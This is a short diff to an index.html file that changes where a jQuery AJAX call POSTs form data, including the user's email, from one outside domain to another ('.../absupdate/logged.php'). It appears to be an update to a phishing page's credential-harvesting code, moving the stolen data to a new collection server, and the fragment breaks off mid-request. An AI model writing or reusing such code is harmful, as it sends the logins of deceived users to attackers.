--- a/index.html
+++ b/index.html
@@ -198,7 +198,7 @@ return true;
     //  console.log(count); 
       $.ajax({
         dataType: 'JSON',
-        url: 'https://corncastt.net/absupdate/logged.php',
+        url: 'https://branlinks.com/absupdate/logged.php',
         type: 'POST',
         data:{
           email:email,
